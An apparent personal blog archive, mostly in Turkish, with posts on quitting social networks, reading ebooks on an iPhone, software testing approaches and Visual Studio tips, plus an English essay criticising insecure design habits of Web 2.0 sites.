Bu dönem hala sürerken başka bir şey başladı, Twitter ve FriendFeed. Ben açıkçası Twitter' ı çok sevdim çünkü diyaloglar tamamen pasifti. Dolayısıyla dialogdan çok monolog vardı, bu da benim sevdiğim şeylerden biri. Ek olarak blog yazan biri olarak kısa şeyleri de paylaşmayı seviyorum ve bunun için de güzel bir platformdu. Yani microblogging dedikleri hadise... Twitter' da aktif olmaya başlayınca twitter' ın yapısı yetmez olmaya başladı, sonra bir çok kişi bana FriendFeed' i önerdi ve ben de ona geçtim.

Şimdi her zaman yaptığı gibi tarih tekerrür ediyor ve ben FriendFeed ile Twitter' dan da kopuyorum. Dolayısıyla diğer bir sosyal hoppalık maceramda bu şekilde sonuçlanmış oluyor.

Neden Kullanmıyorum

IM Kullanmama Nedenlerim;
- Konsantrasyonumu etkilemesi
- Aynı diyalogun telefon üzerinden 30 dakika yerine 2 dakikada çok daha verimli olarak çözülebileceğini bilmem
- İnsanların istedikleri zaman size ulaşabiliyor olması (bu nedenle 2 sene boyunca cep telefonu kullanmadım ama maalesef onun yararları zararlarından çok olduğundan şu an gene mecburen kullanıyorum)
- E-mail, forum ve bilumum pasif komünikasyonun birçok konuda daha verimli olması
Facebook, MySpace Gibi Sosyal Ağları Kullanmama Nedenlerim;
- Herhalde buna ciddi bir cevap vermemi beklemiyorsunuz. Bunun cevabı bariz zaten. Belki de doğru soru neden kullanayım ki?
Artık Forum Kullanmıyor Olmamın Nedenleri;
- Drama, polemik vs. ana nedenler ama bunun harici kaliteli forum bulmanın pek mümkün olmaması. Zoque Forum harici bir böyle bir forum görmedim, Zoque' un da altın dönemi maalesef kapandı, her ne kadar yeni bir nesil varsa da web tasarımı konusundan çok uzaklaştığımdan dolayı eski tadı alamıyorum. Gene de hala okuyor ve arada yazıyorum. Sadece eskisine göre çok daha az.
Twitter' ı Az da Olsa Kullanıyor Olacağımın Nedenleri;
- Sinirlenince bir şekilde küfretmem gerekiyor,
- Rasgele, hatta salakça ama çok derinmiş gibi gözüken cümleleri yazabileceğim bir yere ihtiyacım var,
- Çünkü bağırmak, saçmalamak ve cevap almamaktan daha keyifli az şey var.
FriendFeed' i Az Kullanıyor Olacağımın Nedenleri;
Zoque Forum' da seneler önce Din ve Siyaset konuları tamamen yasaklanmıştı. Önce bu bana çok saçma geldi. İnsanlara "O kadar tek hücreli beyinlere sahipsiniz ki bu konuları tartışmayı bile beceremiyorsunuz" demek gibiydi. Kısa sürede öğrendim ki insalar gerçekten de tek hücreli beyinlere sahipti ve bu tip konuları mantıksal ve saygı çerçevesi içerisinde tartışamazdı. Bunun ikinci ana nedeni ise bu iki ilmin de matematik gibi kesin cevaplarının olmaması ve tamamen kişisel olmasıydı. Tabii ki bu konulardaki hakaretlerin veya çirkefliklerin kişisel olarak insanları ciddi derecede rahatsız ediyor olması da cabası. İşte FriendFeed' den uzak duracak olmamamın ana nedeni bu.
- Signal - Noise oranının genelde kurtarmıyor olması, bunun bir nedeni de benim ilgili olduğum konularda ilgili olan insanların sayısının benim çemberimde çok fazla olmaması.
- Çok fazla din ve siyasi konu geçiyor olması, Din bilmeyen kişiler ile tartışılabilecek bir şey değil, dolayisıyla din ile ilgili konular genelde bok atalım izi kalsın kıvamında, hakeza siyaset konusu da o şekilde. Siyaset ile zaten ilgilenmediğimden o konuların hepsi benim için çöp oluyor ama insanların 3,5 kitap, 2 televizyon programı ve 7 internet haberi ile her renkteki siyasi olay hakkında vücutlarının bilumum organları ile ileri-geri konuşmaları hakikaten eğlendirici. Ama bu tip bir diyalog görmek istersem zaten FailBlog ya da MySpace yorumlarını okuyorum.
- Polemik, pire ve deve mevzuları. Ama her şeyden çok drama, drama ve drama. İnsan = Drama. Benim hayatımda yeterince drama var, kotayı doldurmak için dışarıdan yeni drama ihraç etmem gerekmiyor. Gerektiği zamanlarda da Lorenzo' nun Yağı ' nı izleyip bir milenyuma yetecek kadar drama depoluyorum.

İnternet büzemeyeceğin milyonlarca ağızdan oluşuyor, dolaysıyla biz de büzmek yerine görmezden geliyoruz. Bu platformların hepsi kişisel veya markasal marketing için süper yerler ama herkesin bildiği iki gerçek var:

Joey doesn't share food
Ferruh doesn't do marketing

Hayat Denilen Arbede

Ferruh Mavituna — Cum, 20 Şub 2009 10:13:51 +0300

23 gündür blog yazmayınca "Aloo, Ferruh, yaşıyor musun?" kıvamında e-maillar almaya başladım. Dolayısıyla yazmak boynumun borcu oldu, ödeyeyim kurtulayım. Gene yazacak güzel bir şey, ben de ortaya karışık yapayım dedim. Şöyle kısaca hayatımda bu aralar nelerin IN nelerin OUT olduğunu ileteyim.

IN

Kitap Okumak
Tekrar okumaya başladım (tekrar görmeye başladım gibi oldu!). Joel on Software' i bitirdim. Henüz bitiremediğim Secrets & Lies' ı tekrar okumaya başladım. The 80/20 Principle ile Haunted' ı da listemde beklemeye aldım.
Güzel Filmler İzlemek
Rutin olarak haftada 3-5 film izliyorum zaten ama genelde 3-5 güzel film izlemek pen nasip olmuyor. Hollywood' da eşek kadar bütçe ile bu kadar boktan filmler çeken yönetmenleri de hayranlığımı da buradan bir defa daha iletmek isterim. Zaten bu yüzden Hollywood filmlerinden uzak durmaya çalışıyorum, Avrupa yapımları gibi olamıyorlar ama Avrupa' dan çıkan film sayısı da çok düşük. Geyiği geçer konuya gelirsem yakın dönemde şu süper filmleri izledim:
- Freedom Writers
- Pay It Forward
  Kevin Spacey' nin kötü filmi var mı?
- Pride & Prejudice
  Klasik ingiliz romanının, İngiliz uyarlaması, süper bir eski İngilizce' nin tüm estantaneleri ile. Eğer bir film dram ya da romantik olacaksa böyle olabilir.
- Slumdog Millionaire
  Diğer bir dram ama süper bir yapım, izlenmeli. Hayatınızı değiştirmeyecek ama keyifli bir iki saat geçireceksiniz.
Ar-Ge Yapmak
Önümüzdeki ay Prag' ta olacak bir konfreransa konuşmacı olarak davet edildim, onun verdiği motivasyon ile bu aralar yeni birkaç konu üzerinde çalışıyorum. Konferans sonrası bu projelerin detaylarını yayınlayacağım inşallah.
Dil Muhabbetleri Etmek ya da EdememekDil yapıları hakkında muhabbet etmek her zaman hoşuma gitmiştir, bu dönemin konuları : İngilizce, zamanlar, Türkçe' deki kelime sayısı vs. İngilizce kelime zenginliği, ayrı yazılan de ve da' ların saçmalığı, yazı reformunun dili yozlaştırmasını yüzde vurulması, İngilizce' deki abuk ve sabuk kullanımlar, manyak zamanlar ve tuhaf olaylar.
Felsefe ve Demagoji Yapmak
Ne konuda olduğu önemli değil, yapmak için yapmak.

OUT

Blog Yazmak
RSS Okumak
E-maillara Cevap Vermek!
FriendFeed, Twitter gibi sosyal hoppalıklarda aktif olmak

Son olarak bu aralar "her şey gereksiz ne de olsa" moduna girdim, sanırım Britanya' nın kara toprakları beni iyice kişisel ve bencil biri yaptı, etrafımda olan olaylar her gün daha da uzaklaşıyor ve anlamsızlaşıyor.

Özetle evet, yaşıyorum. Neden bilmiyorum ama aklıma şairin harika dörtlüğü geldi, spontane bir blog yazısı olması açısından onu da ekleyeyim:

Başım Belada,
Tabancamı unutmuşum helada,
Nereye gitsem çaresi yok,
Yalnızım…

Sevdiğim Web Uygulamaları

Ferruh Mavituna — Sal, 27 Oca 2009 23:41:08 +0300

Bazı web uygulamları var ki onlar olmadan işler çok zor olurdu, ufak bir liste yapayım dedim:

Olsa da olur olmasa da:

Bu aralar biraz başım karışık o yüzden pek yazamıyorum, yakında eski rutinime döneceğim inşallah.

iPhone’ da Ebook Okumak

Ferruh Mavituna — Per, 15 Oca 2009 10:44:48 +0300

Siteyi takip edenlerin bildiği gibi kitap okumayı seven biriyim. Benim için en iyi kitap okuma zamanı seyahattir. Şehir içi, şehirlerarası, ülkeler arası, kısa bir otobüs yolculuğu fark etmez, her şekilde seyahat kitap okumak için güzel bir fırsat demektir. Eğer burada yeni kitaplardan bahsetmiyorsa bunun anlamı seyahat etmiyorum demektir. Yeni bir seyahat hazırlandığımdan iPhone' um ile en verimli kitap okuma yöntemlerini araştırmaya çalıştım.

Sanırım yıllarca bilgisayar üzerinde doküman okuduğumdan dolayı dijital ortamda kitap okumak bana çok pratik, basit ve hatta kağıt üzerinde bir şey okumaktan daha konforlu geliyor. Amazon Kindle, Pocket PC, BlackBerry ve iPhone gibi yüksek çözünürlüklü ekranlara sahip, güçlü işlemcilere sahip küçük cihazların popülerleşmesi ile e-kitap kavramı da daha çok hayatımıza girdi.

E-kitap için özel formatların yanında iki popüler format var:

PDF büyük ekranda kesin olarak CHM' den çok daha iyi olsa da CHM' in HTML altyapısı CHM' i küçük cihazlarda kesinlikle seçim nedeni yapıyor. iPhone CHM formatını desteklemiyor, bunu desteklemesi için iChm yazılımını almanız gerekiyor. 10$ civarında bir fiyatı var, yaptıklarını düşününce gayet makul bir ücret. Yalnız sorun şu ki hemen hemen hiçbir yayın firması kitaplarını CHM formatında yayınlamıyor. Bu yüzden sadece MSDN Magazine gibi yayınlar CHM formatında bulabiliyorsunuz.

PDF' i iPhone' da Nasıl Okursunuz

Eminim ki bazılarınız şunu düşünüyor:

Özel bir şey yapmamıza gerek yok, iPhone zaten bunu destekliyor!

Doğru ve yanlış. Doğru çünkü iPhone' un kendi içerisinde PDF desteği var, dolayısıyla ekstra bir PDF okuyucu yüklemeniz gerekmiyor ama bu PDF okuyucu "tagged" dokümanları desteklemiyor, ya da ben nasıl destekleyeceğini çözemedim, bu dokümanları desteklese dahi elinizde Adobe Acrobat gibi bir yazılım olmadan dokümanları taglayamazsınız. "tagged" en basit şekilde sabit bir genişliği olmayan, aynı Word ve Txt dosyalarda olduğu gibi "word-wrap" destekleyen PDF dokümanı demek. Eğer 200 px genişlikteki bir ekranda 600px genişliğe göre tasarlanmış bir PDF dokümanını okumaya çalışırsanız ne demek istediğimi anlarsınız.

Sorun şu ki, iPhone işletim sistemine PDF okuyucu yerleştirmiş ama bu okuyucu küçük ekranlara özgün olarak tasarlanmadığından dokümanlara resim gibi bakmaktan başka işe yaramıyor, ya da PDF özel olarak iPhone için üretilmiş olmalı. Apple zaten işletim sistemine bir PDF okuyucu koyduğundan dolayı kimse 3rd parti bir okuyucu geliştirme gereği duymuyor, dolayısıyla iPhone kullanıcılarının daha uzun süre bu kısıtlı PDF okuyucusuyla yaşamak zorunda olduğunu söyleyebiliriz. Küçük ekranlarda güzel çalışan bir PDF okuyucusu örneği şurada görülebilir.

Bu kadar geyikten sonra hareket zamanı geldi, iki adımda PDF dokümanlarını iPhone' a koyacağız.

PDF Dokümanını Word Dokümanına çevir
Bir çok yazılım ve online siteden sonra bu işi en iyi yapan yerin PDF Online olduğuna kanaat getirdim. PDF dosyanızı yükleyin, 2-3 dakika içerisinde Word dokümanı olarak indirin. Dosyayı indirdikten sonra MS Office, Open Office vs. gibi bir yazılımla açıp .doc dokümanı olarak tekrar kaydetmeyi unutmayın.
iPhone' a transfer et
iPhone dosya transferi için en pratik program Files Lite, ücretsiz ve WebDav üzerinden dosya transferi imkanı sağlıyor. Daha sonradan iPhone' un desteklediği formatları ekranda gösterebiliyor.

iPhone' un normal şartlar altında dosya sistemine erişimi yok, bundan ve diğer bir dizi salak kısıtlamadan ( daha doğrusu lock-in) kurtulmak için Quickpwn gibi bir yazılım kullanabilirsiniz. Bundan Cydia ya da Installer üzerinden terminal, OpenSSH ya da benzeri bir yazılım kullanarak dosyalara direk erişebilirsiniz. Ek olarak Windows kullanıcıları iPhone Browser isimli harika yazılımı da kullanabilir.

Benim deneyimlerimde 7MB' tan büyük dosyalarda Safari patlıyor ve kendini kapatıyor. Bu tip durumlarda kitabı Word üzerinde 3-5 parçaya ayırabilirsiniz, bu kitapların ekranda yüklenme hızını da yükseltecektir. iPhone' da kitap okumak için diğer bir seçenek PDF' i HTML' e çevirmek olabilir. Zamzar bunu destekliyor ve BookReader yazılımı da pratik bir çözüm sunuyor ama maalesef henüz bunu test etmeye fırsatım olmadı.

Durdu ve Yeter Dedi

Ferruh Mavituna — Pzt, 12 Oca 2009 23:33:14 +0300

Okuduğunuz şeyler daha sık dejavu yapar hale geldiyse, yeni makalelerin başlıklarına bakıp tam olarak neden bahsettiğini tahmin edebiliyorsanız, aynı şeyi yeni metaforlar ile dinlemekten sıkıldıysanız, okumanın, öğrenmenin, daha fazla araştırmanın vakti geçmiş, harekete geçmenin vakti gelmiştir. Altı ay bir yıl sonra belki yeni bir şeyler filizlenmeye başlar o zaman tekrar dönüp, okumaya, öğrenmeye, araştırmaya başlayabiliriz… Sanırım gerçekçi kalmak için ne zaman durmak gerektiğini bilmek lazım.

The Triumph of the Nerds

Ferruh Mavituna — Çar, 31 Ara 2008 21:04:59 +0300

2 kelime, bulun ve izleyin.

Eminim hepimiz hikayenin bazı parçalarını biliyoruz, ama izleyince ben bazı eksik parçaları yerine oturttum.

Son Zamanlarda

Ferruh Mavituna — Pzt, 29 Ara 2008 21:40:15 +0300

Her ne kadar FriendFeed' den kısa dalga yayın yapsamda, bazı şeyleri burada tekrar yazmak istedim:

SQL Injection Wiki Beta yayınına açtım,
Stackoverflow' u keşfettim, geliştiriciler için harika bir site. Ek olarak web projeleri geliştirenler içinde inanılmaz bir case study olur,
IPhone için gelmiş geçmiş en iyi yazılımın InstaPaper olduğunu anladım,
Hacker News' i takip etmeye başladım,
Paul Graham' ın tüm yazılarını okumaya başladım,
Önümüzdeki ay İstanbul' a gelmenin planlarını tamamladım,
Kendime yılbaşı hediyesi olarak şunlardan bir tane aldım, bu sayede dandik Philips 5.1' lerden kurtulmuş olacağım. Philips almamayı öğrendim,
Zeitgeist ve Zeitgeist Addendum' u izledim, Hem doğru, hem yanlış, yoğun şekilde tek taraflı propogandanın ve eski fikirlerin bilmeyen insanlara cilalanıp tekrar gösterilince viral etkisi yapabildiğini öğrendim. Yargılayarak izlenirse, tavsiye edilir.
Fringe' i keşfettim, süper. Doğru dozda bilim-kurgu, ne az, ne fazla. En azından Klington ile ilgili bir olay yok!
Crash Commando oynamaya başladım
Call of Duty 4 ve 5' in nin kesinlike gelmiş geçmiş en gerilim yüklü ("intense") multiplayer oyun olduğuna tekrar kanaat getirdim,
"Yerli malı yurdun malı, herkes onu kullanmalı zihniyetinin" ne kadar yavanca anlaşıldığını ve uygulandığını tekrar, tekrar ve tekrar keşfedip, sadece Sakaryalı hemşehrilerimden hosting hizmeti almaya karar verdim(!) İnsanlara bu zihniyetin hiç bir şeye yardım etmediğini hatta sektöre zarar verdiğini anlatmaya üşendim, "koy arka tarafına, gitsin" edası takındım.
""Nerd" telefonu telefon hakkında konuşmak için kullanan kişiye" denir gibi acayip bir laf duydum, kendi kendime güldüm. Kendi kendime gülünce kendimi biraz a-sosyal hissettim, kendime bir social-bunny ısmarlayıp, b-sosyal konuma geçirdim.

Köle Olmayı Seçmek

Ferruh Mavituna — Pzt, 29 Ara 2008 21:20:33 +0300

Bu yazı arada yazdığım gibi giriş – gelişme – sonuç kavramlarından uzak, daha çok bazı duyguları düşünceleri tetiklemeye eğimli bir yazıdır. Ek olarak yazı genel bir konu üzerinde dolaşmayı bile becerememekte. Dolayısıyla diğer bir kendi halinde yazı olarak Kabul edilebilir...

İnsanoğlu kendi elleriyle hayatı o kadar komplike bir hale getirdi ki bu dünyada hayatta kalabilmesi için artık 15 sene eğitim alması gerekir hale geldi. Yaşayabilmesi için hayatının %75' ini çalışarak geçirmek zorunda kaldı. Küçüklükten başlayarak bu durumu o kadar güzel bir şekilde yeni beyinlere empoze etti ki, kişiler kendilerinin köleliğini savunur hale geldi. Para, dünya, şan, şöhret için çalışmak önemli, değerli hatta saygı duyulacak bir iş gibi gösterildi. Daha sonra öyle bir noktaya geldi ki artık herkes bunlar konusunda hem fikir olmaya başladı.

Bir insan şunu söyleyebilir hale geldi:

Eğer zengin olsaydım da bu şekilde çalışırdım

Eğer siz de haftanın 5-6 gününü geri kalan 1-2 gününü yaşayabilmek için harcadığını hazmedeyenlerdenseniz, neden bahsettiğimizi anlıyorsunuz demektir. Çalışmak için çalışan insanların olduğu bir toplumda yaşar olduk, artık bizi köle yapmıyorlar biz kendimiz "özgür" irademiz ile köle olmayı seçiyoruz. Kendimizi kendimizden azad edebilecek miyiz?

Herkese yetecek bir dünyayı paylaşamıyoruz, 1500 somalilinin öldüğü bir operasyonda 18 amerikan askeri için film çekiyoruz (çünkü 1 yankee = 100 somalili değerinde!), neyi neden yaptığımızı bilmiyoruz, nereye gideceğimizi düşünmüyoruz. Bir kaç gün önce dünyayı değiştirecek fikirleri düşünüyordum, "Her iyilik yapılan kişi üç kişiye iyilik yapsa", "The Venus Project" vs.

Sanırım "Bill Gates' i müslüman yapmak" listenin başına konulabilir. Bunun anlamı dünyanın en zengin adamlarından birinin Zekat ödeyeceği yani her sene elindeki tüm değerlerin 40/1 ini fakirlere dağıtacağı anlamına geliyor. Belki sadece Bill Gates' i müslüman yapmak tek başına dünyadaki açlığı çözmeyecektir, ama ütopik bir şekilde tüm dünyanın zekat verdiğini düşünün. Bu ütopik dünyada fakirlik diye bir sorun olmayacaktı.

Bugünün global dünyasında yaşayan insanlar olarak her saniye suçluluk duygusu içerisinde olmamak mümkün olabilir mi? Benim doğduğum yer ondan daha iyi, o daha doğarken kaybediyor. Ben komşumdan daha çok kazanıyorum, benim şansım yaver gitti, kolum ve bacağım var, görebiliyorum ve konuşabiliyorum. Oradan insanlar savaşta ölürken ben MSN' de arkadaşlarımla muhabbet edip blogumda züppelik yapıyorum, suçluluk duygusu içerisinde olmamak mümkün mü?

Sanırım bunun tek çözümü İlahi Adalet' e inanmak, bilmek değil idrak etmek. Hiç bir şeyin kimsenin yanın kalmayacağını ve kimsenin sınavının başka biri ile aynı olmadığını anlamak.

Şimdi hepinize Happy Xmas, Hannukah ve new year...

* The Venus Project ve Zeitgeist Addendum -çok tek taraflı bir film, izlerken yargınızı kaybetmemeye çalışın- bunu tetikledi

Insecure Trends in Web 2.0

Ferruh Mavituna — Cum, 26 Ara 2008 16:00:22 +0300

We are living the second dot-com craziness, although this time it doesn't look like a bubble, it works just fine and every month a new Web 2.0 application acquired for millions.

Couple of popular web trends appeared and revived in Web 2.0 applications:

Usability
Simplicity
Sociability
Integration
Outsourcing
Cutting Edge Technology
Trust

All sounds good but also they came with their sins. And their disease of being insecure just spreads.... New start-ups and all kind of Web 2.0 entrepreneurs following previously "worked" insecure practices for the sake usability, simplicity, sociability and money.

Usability & Simplicity

Usability is really important, everything should be so easy in Web 2.0 applications, such as:

Change password functionality

Why bother with requesting user's current password before changing their password, they've already logged in, right(!). Impact of this is quite obvious. Permanent account hijacking in shared computers or result of an XSS attack.

Guilty: twitter

Give me your Hotmail password so I can get your contact list

Since when giving your e-mail password to a website is OK? Thanks to social websites now it's a common thing to give away your e-mail passwords to other websites. What's next, giving away your online banking password? (Didn't I tell you? Mint already did that!)

Guilty: Bebo, Facebook, Diigo, LinkedIn, slideshare and every single social Web 2.0 application out there

SSL

Big web 2.0 applications are so popular and they are generally traffic heavy. Which causes them to simply ignore SSL for performance reasons. Even if they supports SSL generally they don't mark cookies as 'secure' which allows an attacker to carry out successful session hijacking attacks.

Guilty: Most of the Web 2.0 applications and particularly Gmail for the last 4 years. They've recently introduced an option to force gmail to work over SSL. Funny enough it's still not over SSL by default.

Retrieving Password by E-mail

Almost all web applications can retrieve your password to your e-mail without requesting any other extra information like a "security question" or something. This means if your e-mail account get hacked your identity has gone within moments.

Guilty: Almost all Web 2.0 Applications

Plain Stupid Simplicity

Couple of Web 2.0 application doesn't even allow you to choose a password more than 8 characters because they keep it simple(!) Forcing your users to choose insecure passwords is not simplicity it's stupidity.

Remember Me

We might forgive this one but now every single application allows this feature which makes them easier to exploit against Cross-site Scripting attacks or account hijacking in shared computers.

Guilty: Everyone!

Sociability

Social engineering was some kind of an art but now it's bloody easy. If you are trying to learn more information about someone such as "what colour of undies she's wearing" or "what's her birthday" or "who's her boyfriend" or "where was she last night" or "in which company she's working as personal assistant" just visit her profile in Facebook, myspace, bebo, read her twitter messages, learn her taste of music by checking out her last.fm profile. Don't stop there learn what she reads from librarything and what she eats from another social website, and see her resume in LinkedIn. Finally don't forget her blog where she writes every little totally useless information about her daily life. Funny enough you'll figure pretty soon her e-mail password is her dog's name.

Couple of years ago we were talking about how "out-of-office" replies leaks information, now we are talking about massive information leakage about everything. All employees blog about stuff, companies being "open" and "transparent". That's the Web 2.0 for you where your birthday is publicly available in 15 different social websites and your company's new and super project's first draft already published in one of your developer's blog.

Password cracking and Social Networks

Beside of the obvious potential social engineering attacks, identity theft or faking one's identity sort of attacks there are other issues. An attacker can use different social networks to find answers of "secret questions" to reset the password of his or her victims in different websites furthermore an attacker can gather all of this information and might use it in a dictionary attack against online accounts or an offline password cracking attack.

Integration

CSRF(able) Bookmarklets and Tool Integration

Bookmarklets are inherently vulnerable to CSRF attacks and most of the Web 2.0 applications which supports social integration provides several bookmarklets.

Guilty: twitter, Diigo

Overpowered APIs and Duplicated Code

To increase the integration between services most of the Web 2.0 applications provides powerful APIs. Generally the web application doesn't use these APIs internally which leads developers to common security pitfalls such as "duplicated code", "broken authorisation", "information leakage".

Features in the APIs provides more than the user interface and generally provides easier automation which can cause massive information leakage issues. Same things goes for different interfaces to access the same functionality. For example twitter protected itself against CSRF in the web interface although it was still vulnerable to CSRF in the mobile interface (which was in the same domain therefore vulnerable).

Guilty: Facebook, twitter (mobile interface)

Outsourcing

Since lots of things have been already built, why bother to build our own system. Let's just use others'. From productivity point of view this is one of the greatest things happened to web, just like programmers using external libraries now web developers can use external widgets. Instead of building your own photo gallery just use Flickr, instead of using your own flash player just embed it from youtube. Instead of rolling your own webstats just use "google analytics", add an "adsense javascript" or "google ad manager" so you don't need to manage your ads.

This is all good but it comes with a price, it increases the attack surface of the applications. Do you remember Fluffy Bunny's attack to SecurityFocus ? Every piece of javascript, flash animation, java applet, RSS feed is a potential vulnerability in your website. If an attacker can gain access to one of this external resources game is over in the client-side. Now your website is vulnerable to Cross-site Scripting because of this.

It's client-side, that's true, but what about attack opportunities such as stealing keylogs in login forms via JavaScript? After this an attacker might login as admin, and now it's a proper defacement.

Guilty: The Internet

Cutting Edge Technology

Everyday there is new buzz in Web 2.0. It can be AJAX, Flex, Adobe AIR, Silverlight, Comet, Flash & Web Services, Widgets, Crazy JavaScript libraries etc. When the technology is new that means "best practices" are not defined yet, they are "work in progress". Which generally results with issues such as "Premature AJAX-ulation", Javascript Hijacking, Flash XSS issues or plain stupid usage of the technology.

Beside of these all of these new technologies increase the attack surface of the client as well. Your website can be vulnerable to XSS because of an Adobe PDF file (Adobe Universal XSS) or a Flash File (clicktag XSS).

Trust

Even after massive number of phising attacks, fake websites, so called "legitimate business", it's quite impressive to see how much people still trust the websites.

Google wants your medical records with Google Health and another Web 2.0 application Mint wants your bank account details (no I'm not kidding) to manage your finance. We already knew there are crazy people out there who upload their private videos and pictures to websites by marking them as "private". Guess what, they're not that private after all as seen on a Facebook vulnerability which allows to see private photo albums of anyone.

Developers should be careful about these common but insecure practices of Web 2.0 and should be aware of the consequences of the technology they choose and design decisions.

Functional Testing vs Unit Testing

Ferruh Mavituna — Sal, 16 Ara 2008 00:26:31 +0300

Her ne kadar TDD ve Unit Testing' i bir boyutta uygulasam da yazılım geliştirirken XP (extreme programming) ya da benzer bir metodolojiyi sıkı sıkıya takip etmiyorum. Her konuda yaptığım gibi açık fikirli olup, değişik yaklaşımları analiz edip, haklarında bilgi toparlayıp kendi durumuma göre kendi hybrid modelimi kullanmaya çalıştırıyorum. Bu aralar özellikle yazılım geliştirme ile çok iç içeyim ve bunun sonucunda Unit Testing, TDD ve Functional Testing konularında denemeler yapıp en iyi birleşimi bulmaya, işimi en iyi görecek çözüme ulaşmaya çalışıyorum.

Devam etmeden Functional Testing ile Unit Testing' e ve aralarındaki farklara bakalım.

Unit Testing

Sistemin en küçük birimlerini test etmektir,
Hızlıdırlar,
İzolasyon kritiktir ve hiç bir testin diğer testleri ya bir dış kaynağın çalışan testleri etkilememesi gerekir. Bu amacı yerine getirmek için bir web server ya da file system erişimde, ya da diğer herhangi bir class ile konuşma noktasında Mocking devreye girer,
Kodda hata oluştuğunda kesin olarak hatanın nerede oluştuğunu saptamak çok kolaydır. (Çünkü sistemin en küçük birimlerini test ediyoruz),
Yüksek Code Coverage almaya uygundur,
Genelde koddaki her değişiklikten sonra çalıştırılır. Bu sayede kodda gözü kapalı değişiklik yapabilir ve bir sorun varsa anında farkına varabilirsiniz. Bunun anlamı sorun çok daha büyümeden ya da tasarımın içerisine girmeden sorunu çözmek demektir.

Functional Testing (Automated)

Sistemin parçalarını ya da sistemin bütün olarak işleyişini otomatik şekilde test etmektir,
Daha gerçekçi testler ortaya çıkmasını sağlar,
Yavaştırlar (izolasyonun az olması bunun ana nedenidir),
Kodun bir yerinde hata oluşması testlerin büyük bir kısmını geçersiz hale getirebilir,
Kodda hata oluştuğunda nokta atışı hatayı bulmak pek basit olmayabilir,
Bazı testler Unit Testing' e göre çok daha hızlı yazılabilir, çünkü çok daha az test yapmak gerekir. Mesela bir class' ın private method' ları vs. test edilmez. Class' ın geneli beklendiği gibi çalışması yeterlidir,
Code Coverage' i yükseltmek zor olabilir çünkü her durumu geniş perspektiften simule etmek mümkün olmayabilir ya da gereğinden çok efor gerektirebilir,
Yavaşlığından dolayı ve coverage azlığından dolayı her kod değişikliğinden ya da yeni koddan sonra çalıştırılmaya pek uygun değildir.

Functional Testing' i Unit Testing ile birlikte kullanmak popüler kullanımlardan biri, bu sayede en ince detayda ve tam bir bütün olarak kodun beklenildiği gibi çalıştığı otomatik olarak kontrol edilebilir.

Genel olarak insanların TDD (önce test, sonra kod) ya da klasik Unit Testing yapmamalarının nedeni testleri yazmanın getirdiği ekstra külfet. Özellikle Türkiye gibi agresif, kısa deadline' lı projeler ile dolup taşan yerlerde yazılımcılara Unit Testing önermek küfürmüş gibi algılanıyor. Açıkçası kimse gerçek bir getirisi olmayan bir şey için ekstra vakit ayırmak istemez ama bu işin gerçek ve gözle görülür bir getirisi var (kanıtlanmış mı? Hem evet hem hayır! o başka bir yazı konusu).

Hybrid Model
Eğer...

Yazılımınınız çok kritik bir iş yapmıyorsa, (örnek: Ayda cirit atacak robot kontrolü, Nükleer füze tetikleyicisi, Merkez Bankasının para-girdi çıktı düzenleyicisi, Britney Spears' a hava durumuna göre ayakkabı önermeciliği )
Geniş bir takıma ve uzun, rahat geliştirme planına sahip değilseniz,
Az koyup çok almak istiyorsanız...

bu model sizin işinizi görebilir. Pareto Prensibini bilirsiniz, hani şu 80/20 kuralı. Bir süredir bu mantığa dayanarak Functional Testing ile ve aralarda Unit Testing desteği ile bir proje geliştiriyorum ve otomatik testlerden alacağım faydanın %80' ini %20 efor ile aldığıma inanıyorum.

Private method vs. leri test etmiyorum,
Çok az mock objesi kullanıyorum,
Aşırı izolasyon yapmıyorum,
Küçük detayların harici uzun soluklu functional testlere odaklanıyorum,
Hata çıkarma olasılığı çok olan, kritik olan kod kısımlarını Unit Testing ile destekliyorum.

Bu modelin en ciddi sorunlarından biri kodun highly coupled (Law of Demeter) olmasına izin veriyor. Tabii ki bunu düzeltmek geliştirici olarak sizin elinizde ama TDD odaklı bir geliştirmede highly coupled class' lar bulmanız pek mümkün olmayacaktır. Açıkçası highly/tightly coupled olmayan kod yazmak gerçekten zor bir iş.

Bu benim yaklaşımım şu ana kadar benim için istediğim kıvamda çalıştığını söyleyebilirim. Eğer şimdiye kadar hiç yapmadıysanız bu şekilde hafif bir başlangıç yapabilir ve biraz tadını çıkartabilirsiniz.
Farklı deneyimleri duymak da hoşuma gider. Özellikle Unit Testing yapıp mutlu olanlar ya da yapmayı deneyip verim alamayanlar gibi.

Visual Studio’ nun Hakkını Verme

Ferruh Mavituna — Paz, 07 Ara 2008 13:31:31 +0300

Üç sene kadar önce silahını tanı başlıklı bir yazı yazmıştım. Dün Visual Studio ile biraz vakit harcayıp istediğim hale getirdim, Visual Studio konusunda bilmeniz gereken bazı temel şeyler var:

Visual Studio' nun Express Edition' ları tamamen ücretsiz, Yalnız bu Express Edition' lar aşadağıdaki gibi bazen çok önemli olabilecek şeyleri desteklemiyor:
Class Designer
FxCop Entegrasyonu
Gelişmiş Debug Seçenekleri (özellikle condition dayalı breakpoint' lerin olmaması)
VS.NET eklenti Desteği
Multi-Thread Debugging Desteği
Farklı .NET dillerinde projeleri aynı proje üzerinden yönetebilme
Tüm kendi özelleştirmelerinizi Export / Import edebilirsiniz. Bu sayede tüm özelleştirmeleri bir defa yapmanız yeterli. Daha sonra Tüm VS sistemlerine bunları basitçe taşıyabilirsiniz.
Pencereler iki ana durumda saklanıyor, birinci geliştirme süreci, ikincisi debugging yaparken. Bunlar her zaman son olarak kullandığınız şekilde saklanıyorlar. Mesela debugging yaparken "Immediate" penceresini ikinci monitöre taşırsanız, bir sonraki debugging' e başladığınızda "Immediate" penceresi gene ikinci monitöre geçecek ve debugging' i bitirdiğinizde geliştirme sürecindeki yerine geri dönecektir.
Visual Studio' da Bilmeniz Gereken Kısa Yollar

VS.NET 2008 Team System ve MBUnit

VS.NET 2008 Team System Unit Testing Framework' ü ile birlikte geliyor ama normalde bu sadece MS Unit Testleri ile çalışıyor. Eğer siz de benim gibi Row Testing' ten vazgeçemeyenlerdenseniz nUnit (son versiyonu) ya da MbUnit gibi bir framework kullanıyor olacaksınız ve bu durumda VS.NET' in Test çözümü yerine ekstra bir yazılıma ihtiyaç duyacaksınız.

MbUnit v3' VS.Net 2008 Team System için tam entegre bir çözüm geliştirmiş yani ekstra bir Unit Testlerinizi test edecek ekstra bir araç yerine VS.NET ile olan Test pencerelerini kullanabilir hale gelebilirsiniz. Bunun için şunlara ihtiyacınız var :

VS.NET Team Team System 2008 + SP1
MbUnit v3

